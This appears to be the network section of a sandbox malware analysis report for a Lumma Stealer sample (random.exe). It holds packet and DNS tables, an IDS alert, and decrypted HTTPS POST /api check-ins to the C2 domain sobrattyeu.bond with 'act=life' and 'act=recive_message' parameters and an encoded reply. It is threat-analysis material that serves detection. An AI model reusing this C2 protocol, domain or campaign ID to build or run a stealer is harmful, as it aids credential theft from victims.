2025-01-14T11:18:11.552584+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49722	104.21.96.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2025 11:18:01.883438110 CET	49713	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:01.883474112 CET	443	49713	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:01.883563995 CET	49713	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:01.884511948 CET	49713	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:01.884527922 CET	443	49713	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:02.359946012 CET	443	49713	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:02.360030890 CET	49713	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:02.362643957 CET	49713	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:02.362652063 CET	443	49713	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:02.364039898 CET	443	49713	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:02.406228065 CET	49713	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:02.426516056 CET	49713	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:02.426544905 CET	49713	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:02.426882982 CET	443	49713	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:02.843254089 CET	443	49713	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:02.843511105 CET	443	49713	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:02.843589067 CET	49713	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:02.845854998 CET	49713	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:02.845885038 CET	443	49713	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:02.845897913 CET	49713	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:02.845904112 CET	443	49713	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:02.855946064 CET	49715	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:02.855983019 CET	443	49715	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:02.856062889 CET	49715	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:02.856466055 CET	49715	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:02.856487036 CET	443	49715	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:03.321602106 CET	443	49715	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:03.321723938 CET	49715	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:03.323173046 CET	49715	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:03.323184967 CET	443	49715	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:03.323534966 CET	443	49715	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:03.324709892 CET	49715	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:03.324750900 CET	49715	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:03.324800968 CET	443	49715	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:03.799755096 CET	443	49715	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:03.799913883 CET	443	49715	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:03.799972057 CET	49715	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:03.800002098 CET	443	49715	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:03.800085068 CET	443	49715	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:03.800131083 CET	49715	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:03.800138950 CET	443	49715	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:03.800246000 CET	443	49715	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:03.800290108 CET	49715	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:03.800297976 CET	443	49715	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:03.800399065 CET	443	49715	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:03.800482988 CET	443	49715	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:03.800585985 CET	443	49715	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:03.800725937 CET	49715	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:03.800725937 CET	49715	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:03.800738096 CET	443	49715	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:03.804286003 CET	443	49715	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:03.804363012 CET	49715	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:03.804371119 CET	443	49715	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:03.859368086 CET	49715	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:03.887061119 CET	443	49715	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:03.887232065 CET	443	49715	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:03.887284040 CET	49715	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:03.887304068 CET	443	49715	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:03.887490988 CET	443	49715	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:03.887563944 CET	49715	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:03.979895115 CET	49715	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:03.979926109 CET	443	49715	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:03.979939938 CET	49715	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:03.979945898 CET	443	49715	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:04.080147028 CET	49717	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:04.080229044 CET	443	49717	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:04.080312967 CET	49717	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:04.080677986 CET	49717	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:04.080691099 CET	443	49717	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:04.555788994 CET	443	49717	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:04.555866003 CET	49717	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:04.557566881 CET	49717	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:04.557585001 CET	443	49717	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:04.557903051 CET	443	49717	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:04.559376955 CET	49717	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:04.559505939 CET	49717	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:04.559552908 CET	443	49717	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:05.089011908 CET	443	49717	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:05.089107037 CET	443	49717	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:05.089258909 CET	49717	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:05.089351892 CET	49717	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:05.089373112 CET	443	49717	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:05.107059002 CET	49718	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:05.107168913 CET	443	49718	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:05.107338905 CET	49718	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:05.107623100 CET	49718	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:05.107659101 CET	443	49718	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:05.577364922 CET	443	49718	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:05.577527046 CET	49718	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:05.579073906 CET	49718	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:05.579101086 CET	443	49718	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:05.579956055 CET	443	49718	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:05.581334114 CET	49718	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:05.581537962 CET	49718	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:05.581588030 CET	443	49718	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:05.581650972 CET	49718	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:05.581664085 CET	443	49718	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:06.130110025 CET	443	49718	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:06.130379915 CET	443	49718	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:06.130533934 CET	49718	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:06.130800962 CET	49718	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:06.130841017 CET	443	49718	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:06.209322929 CET	49719	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:06.209381104 CET	443	49719	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:06.209469080 CET	49719	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:06.209803104 CET	49719	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:06.209814072 CET	443	49719	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:06.667931080 CET	443	49719	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:06.668015003 CET	49719	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:06.670016050 CET	49719	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:06.670031071 CET	443	49719	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:06.670381069 CET	443	49719	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:06.672184944 CET	49719	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:06.672388077 CET	49719	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:06.672415972 CET	443	49719	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:06.672528982 CET	49719	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:06.672538996 CET	443	49719	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:07.278517008 CET	443	49719	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:07.278629065 CET	443	49719	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:07.278683901 CET	49719	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:07.278772116 CET	49719	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:07.278793097 CET	443	49719	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:07.357691050 CET	49720	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:07.357737064 CET	443	49720	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:07.357810020 CET	49720	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:07.358055115 CET	49720	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:07.358067989 CET	443	49720	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:07.837511063 CET	443	49720	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:07.837594032 CET	49720	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:07.838732004 CET	49720	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:07.838742018 CET	443	49720	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:07.839515924 CET	443	49720	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:07.840646029 CET	49720	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:07.840713024 CET	49720	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:07.840718985 CET	443	49720	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:08.162986040 CET	443	49720	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:08.163239002 CET	443	49720	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:08.163304090 CET	49720	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:08.163430929 CET	49720	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:08.163451910 CET	443	49720	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:08.467274904 CET	49721	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:08.467344999 CET	443	49721	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:08.467433929 CET	49721	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:08.467732906 CET	49721	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:08.467756987 CET	443	49721	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:08.947571039 CET	443	49721	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:08.947720051 CET	49721	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:08.948817015 CET	49721	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:08.948853016 CET	443	49721	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:08.949258089 CET	443	49721	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:08.950407028 CET	49721	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:08.951164007 CET	49721	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:08.951214075 CET	443	49721	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:08.951373100 CET	49721	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:08.951420069 CET	443	49721	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:08.951570034 CET	49721	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:08.951625109 CET	443	49721	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:08.951796055 CET	49721	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:08.951843023 CET	443	49721	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:08.952027082 CET	49721	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:08.952073097 CET	443	49721	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:08.952313900 CET	49721	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:08.952359915 CET	49721	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:08.960822105 CET	443	49721	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:08.961052895 CET	49721	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:08.961096048 CET	443	49721	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:08.961143017 CET	49721	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:08.961244106 CET	49721	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:08.961291075 CET	49721	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:08.966553926 CET	443	49721	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:08.966768980 CET	49721	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:08.966830969 CET	49721	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:08.966897011 CET	49721	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:08.967253923 CET	443	49721	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:08.967358112 CET	49721	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:08.967379093 CET	443	49721	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:10.545170069 CET	443	49721	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:10.545424938 CET	443	49721	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:10.545686960 CET	49721	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:10.546169043 CET	49721	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:10.546196938 CET	443	49721	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:10.550287008 CET	49722	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:10.550338984 CET	443	49722	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:10.550415993 CET	49722	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:10.550898075 CET	49722	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:10.550911903 CET	443	49722	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:11.050753117 CET	443	49722	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:11.050851107 CET	49722	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:11.052337885 CET	49722	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:11.052350998 CET	443	49722	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:11.052706957 CET	443	49722	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:11.053947926 CET	49722	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:11.053976059 CET	49722	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:11.054025888 CET	443	49722	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:11.552609921 CET	443	49722	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:11.552855015 CET	443	49722	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:11.552936077 CET	49722	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:11.553105116 CET	49722	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:11.553129911 CET	443	49722	104.21.96.1	192.168.2.5
Jan 14, 2025 11:18:11.553139925 CET	49722	443	192.168.2.5	104.21.96.1
Jan 14, 2025 11:18:11.553145885 CET	443	49722	104.21.96.1	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2025 11:18:01.857173920 CET	52241	53	192.168.2.5	1.1.1.1
Jan 14, 2025 11:18:01.876703978 CET	53	52241	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 14, 2025 11:18:01.857173920 CET	192.168.2.5	1.1.1.1	0x952d	Standard query (0)	sobrattyeu.bond	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 14, 2025 11:18:01.876703978 CET	1.1.1.1	192.168.2.5	0x952d	No error (0)	sobrattyeu.bond	104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 14, 2025 11:18:01.876703978 CET	1.1.1.1	192.168.2.5	0x952d	No error (0)	sobrattyeu.bond	104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 14, 2025 11:18:01.876703978 CET	1.1.1.1	192.168.2.5	0x952d	No error (0)	sobrattyeu.bond	104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 14, 2025 11:18:01.876703978 CET	1.1.1.1	192.168.2.5	0x952d	No error (0)	sobrattyeu.bond	104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 14, 2025 11:18:01.876703978 CET	1.1.1.1	192.168.2.5	0x952d	No error (0)	sobrattyeu.bond	104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 14, 2025 11:18:01.876703978 CET	1.1.1.1	192.168.2.5	0x952d	No error (0)	sobrattyeu.bond	104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 14, 2025 11:18:01.876703978 CET	1.1.1.1	192.168.2.5	0x952d	No error (0)	sobrattyeu.bond	104.21.16.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

sobrattyeu.bond

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49713	104.21.96.1	443	5332	C:\Users\user\Desktop\random.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 10:18:02 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: sobrattyeu.bond
2025-01-14 10:18:02 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-14 10:18:02 UTC	1121	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 10:18:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=onfa62bapr8fua3te18v41vbna; expires=Sat, 10 May 2025 04:04:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3mqAJoJ6f2Thc3HhLTsVVFAtK0FcAj9Ds3tn0XRMfmKxapW4Pq2N1%2B8BDsewy5s7lI1gWW6PxNYEIVfprsIZPYnW6%2F1TZdGjIQAa25NJ9hvUBbqpmyoSl1DBS2sATDjzIik%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901ce13579b172a4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1941&min_rtt=1939&rtt_var=732&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1489036&cwnd=212&unsent_bytes=0&cid=dda37119a05b7b70&ts=498&x=0"
2025-01-14 10:18:02 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-14 10:18:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49715	104.21.96.1	443	5332	C:\Users\user\Desktop\random.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 10:18:03 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 45 Host: sobrattyeu.bond
2025-01-14 10:18:03 UTC	45	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 37 74 78 32 6a 6f 2d 2d 39 32 35 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=7tx2jo--925&j=
2025-01-14 10:18:03 UTC	1125	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 10:18:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=iba672adu11kpck2vo25asp3es; expires=Sat, 10 May 2025 04:04:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pot6J%2B9Pc29TlgQ1nKyfreqm0t1V4BcallCf%2FGNvcCTJ0XCEwuY%2FWzalT7cZb8NawHuz7CFtZb%2BFLen42wRPwHQNoxsoRbcy7oMYJxeJuLsvP8f1CzlJGGsevRo3533Lbeg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901ce13b4bae4363-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1546&min_rtt=1537&rtt_var=595&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=944&delivery_rate=1809169&cwnd=240&unsent_bytes=0&cid=89b868fd248d8814&ts=488&x=0"
2025-01-14 10:18:03 UTC	244	IN	Data Raw: 31 34 37 62 0d 0a 64 30 78 49 76 6c 35 58 74 61 38 6b 41 4d 4a 52 72 35 77 4c 49 4b 4a 45 35 72 6c 45 4c 39 56 77 41 46 35 73 69 61 6e 78 34 47 30 4d 62 6a 36 63 5a 47 4f 5a 6a 56 64 6c 34 47 76 62 37 6e 35 46 6a 6d 61 48 33 57 59 56 73 78 46 73 4c 51 6d 6c 69 34 65 4e 54 30 30 71 4b 64 49 74 4d 70 6d 4e 51 58 6a 67 61 2f 54 6e 4b 55 58 4d 5a 74 79 62 49 55 57 33 45 57 77 38 44 65 4c 47 67 59 77 4f 48 79 41 76 31 6a 73 30 30 63 35 49 62 61 63 30 79 76 31 68 54 73 73 70 6a 74 52 6d 41 2f 63 56 65 6e 78 57 71 2b 53 55 6c 41 77 36 4c 54 76 56 66 43 71 5a 31 41 5a 6c 72 48 4f 56 76 6d 70 46 77 43 69 41 33 53 39 48 76 52 68 6b 50 51 6a 6a 32 5a 69 47 42 52 38 75 4c 4e 63 78 50 63 58 44 51 6d 71 73 4d 73 44 39 4b 51 79 41 49 5a Data Ascii: 147bd0xIvl5Xta8kAMJRr5wLIKJE5rlEL9VwAF5sianx4G0Mbj6cZGOZjVdl4Gvb7n5FjmaH3WYVsxFsLQmli4eNT00qKdItMpmNQXjga/TnKUXMZtybIUW3EWw8DeLGgYwOHyAv1js00c5Ibac0yv1hTsspjtRmA/cVenxWq+SUlAw6LTvVfCqZ1AZlrHOVvmpFwCiA3S9HvRhkPQjj2ZiGBR8uLNcxPcXDQmqsMsD9KQyAIZ
2025-01-14 10:18:03 UTC	1369	IN	Data Raw: 79 62 66 67 33 6b 49 47 45 74 48 2f 37 47 67 34 52 50 43 6d 41 7a 6e 44 73 35 6c 35 55 47 61 71 77 39 79 50 31 6d 52 63 45 6d 6c 74 51 6d 54 72 38 61 5a 6a 59 42 35 4d 53 64 69 41 67 64 4a 79 33 54 4f 7a 33 52 77 6b 55 69 37 6e 50 4b 35 69 6b 61 67 41 61 55 32 43 56 5a 75 67 4d 69 49 30 44 79 69 35 53 4f 54 30 31 75 4c 4e 49 39 4f 4e 66 66 54 6d 6d 72 4e 74 2f 31 59 45 2f 4e 4a 6f 6e 52 4b 55 36 33 46 57 67 32 41 65 48 50 6e 6f 38 4a 46 53 35 71 6b 6e 77 79 7a 34 30 65 49 6f 4d 32 33 66 6c 6c 56 49 49 63 78 4d 52 6f 56 50 63 56 62 6e 78 57 71 38 4f 57 67 51 77 65 49 53 6e 55 4e 79 66 58 33 30 42 76 70 53 48 4c 2b 32 64 49 77 7a 53 4f 31 53 42 4f 76 68 6c 72 4f 51 6e 76 69 39 33 43 43 41 31 75 63 70 77 64 4f 4e 7a 42 54 48 57 67 63 39 4b 77 63 41 4c 48 4b Data Ascii: ybfg3kIGEtH/7Gg4RPCmAznDs5l5UGaqw9yP1mRcEmltQmTr8aZjYB5MSdiAgdJy3TOz3RwkUi7nPK5ikagAaU2CVZugMiI0Dyi5SOT01uLNI9ONffTmmrNt/1YE/NJonRKU63FWg2AeHPno8JFS5qknwyz40eIoM23fllVIIcxMRoVPcVbnxWq8OWgQweISnUNyfX30BvpSHL+2dIwzSO1SBOvhlrOQnvi93CCA1ucpwdONzBTHWgc9KwcALHK
2025-01-14 10:18:03 UTC	1369	IN	Data Raw: 43 75 68 34 69 63 6b 37 73 30 39 50 61 54 7a 38 74 50 74 38 32 64 2b 4c 4f 53 47 79 6e 4a 59 33 68 4a 31 75 41 49 59 69 62 66 67 32 36 45 32 6f 36 48 4f 54 47 6b 49 77 42 47 69 73 6c 31 44 77 31 32 73 68 43 61 61 73 77 77 50 70 37 53 4d 41 75 67 64 6f 73 52 2f 64 63 49 6a 73 57 71 35 50 54 73 78 67 65 62 42 2f 66 4d 6a 76 51 32 77 5a 39 37 69 71 4e 2b 57 55 43 6d 47 61 4a 30 79 4e 49 75 42 4e 6f 4d 67 76 68 78 35 75 4d 44 41 63 68 4c 74 77 77 50 64 33 41 53 47 61 6f 4f 73 62 31 62 30 4c 42 4c 4d 53 56 5a 6b 71 76 55 6a 70 38 4f 75 7a 48 6e 6f 31 4e 49 43 30 6b 30 6a 73 6a 6c 39 49 49 65 2b 41 30 77 62 34 78 41 73 77 76 68 4e 41 73 53 62 63 56 62 7a 6b 4e 37 4d 69 65 68 51 55 62 4b 53 37 51 4e 54 6a 52 7a 55 46 6d 70 53 48 49 39 32 56 4f 67 47 6a 45 33 44 Data Ascii: Cuh4ick7s09PaTz8tPt82d+LOSGynJY3hJ1uAIYibfg26E2o6HOTGkIwBGisl1Dw12shCaaswwPp7SMAugdosR/dcIjsWq5PTsxgebB/fMjvQ2wZ97iqN+WUCmGaJ0yNIuBNoMgvhx5uMDAchLtwwPd3ASGaoOsb1b0LBLMSVZkqvUjp8OuzHno1NIC0k0jsjl9IIe+A0wb4xAswvhNAsSbcVbzkN7MiehQUbKS7QNTjRzUFmpSHI92VOgGjE3D
